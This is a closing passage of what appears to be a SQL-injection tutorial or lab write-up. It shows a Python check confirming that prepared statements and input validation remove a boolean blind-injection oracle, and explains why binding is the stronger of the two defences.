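    print("oracle, prepared:  ", has_boolean_oracle(lookup_prepared, con))    # False
    print("oracle, validated: ", has_boolean_oracle(lookup_validated, con))   # False
```

    The bound query returns nothing for both probes because the whole string, quotes and all, is compared against the integer column as one value; that identical answer is exactly what removes the oracle that the Medium and High runs above relied on. Validation on its own is weaker than binding (it only works where the input has a narrow shape), which is why defence 1 is layered in front of defence 2 rather than replacing it.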

    The End !

    Article link: https://www.haomeiwen.com/subject/kgxnnqtx.html